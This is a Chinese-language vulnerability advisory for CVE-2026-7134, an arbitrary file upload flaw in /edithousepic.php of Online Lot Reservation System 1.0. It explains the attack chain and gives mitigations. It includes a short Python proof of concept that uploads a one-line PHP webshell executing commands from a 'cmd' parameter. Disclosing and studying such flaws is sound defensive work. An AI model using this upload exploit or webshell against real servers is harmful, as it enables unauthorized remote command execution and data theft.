CVE-2026-7134 CVSS 4.7 中危

CVE-2026-7134: Online Lot Reservation System 任意文件上传漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7134

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Lot Reservation System

漏洞概述

code-projects Online Lot Reservation System 1.0 版本中存在安全漏洞。该漏洞位于 /edithousepic.php 文件中，由于对 image 参数的处理缺乏有效限制，导致攻击者可以上传任意恶意文件。该漏洞可被远程利用，且已有公开的利用代码，对系统安全性构成威胁。

技术细节

该漏洞的根源在于 code-projects Online Lot Reservation System 1.0 版本在处理图片上传逻辑时存在严重缺陷。具体而言，/edithousepic.php 文件接收用户提交的 image 参数，但后端代码未对上传文件的扩展名、文件头（Magic Number）或文件内容进行有效的安全验证。攻击者可以借此绕过前端简单的 JavaScript 限制，直接向服务器发送包含恶意 PHP 代码的文件。由于系统未重命名文件或禁止上传目录的脚本执行权限，攻击者上传的 Webshell 文件会被保留在 Web 服务器根目录下。鉴于 CVSS 评分要求高权限（PR:H），攻击者通常需要先登录管理员账户，随后利用此漏洞上传 Webshell，从而获得服务器的远程控制权，进一步窃取数据或破坏系统完整性。

攻击链分析

STEP 1

1. 获取权限

攻击者需要拥有管理员或高权限账户（PR:H），登录到 Online Lot Reservation System 后台。

STEP 2

2. 构造恶意数据

攻击者准备包含恶意代码的 PHP 文件，并将其命名为图片格式或直接保留 .php 后缀，准备发送给服务器。

STEP 3

3. 发送上传请求

攻击者向 /edithousepic.php 发送 POST 请求，在 image 参数中附带恶意文件。

STEP 4

4. 文件上传与执行

服务器由于未验证文件类型，将恶意文件保存到 Web 目录。攻击者随后浏览器访问该文件路径，执行恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/edithousepic.php"

# PHP webshell content
shell_content = "<?php system($_GET['cmd']); ?>"

# The parameter name is 'image' as per the description
files = {
    'image': ('exploit.php', shell_content, 'application/x-php')
}

# Additional data if required by the form
data = {
    'id': '1' 
}

try:
    response = requests.post(url, files=files, data=data)
    if response.status_code == 200:
        print("[+] File uploaded successfully.")
        print("[+] Check the upload path to access the shell.")
    else:
        print("[-] Upload failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

code-projects Online Lot Reservation System 1.0

防御指南

临时缓解措施

建议在服务器配置层面禁止上传目录（如图片保存路径）的 PHP 脚本执行权限。同时，应在应用层面对 /edithousepic.php 接口增加文件类型检查逻辑，仅允许 JPG、PNG 等图片格式上传，并强制修改上传文件的名称。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7134
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7134
3 Details https://www.cvedetails.com/cve/CVE-2026-7134/
4 VulDB https://vuldb.com/cve/CVE-2026-7134
5 Link https://code-projects.org/
6 Link https://github.com/zzk6th/cve/issues/4
7 Link https://vuldb.com/submit/800983
8 Link https://vuldb.com/vuln/359733
9 Link https://vuldb.com/vuln/359733/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表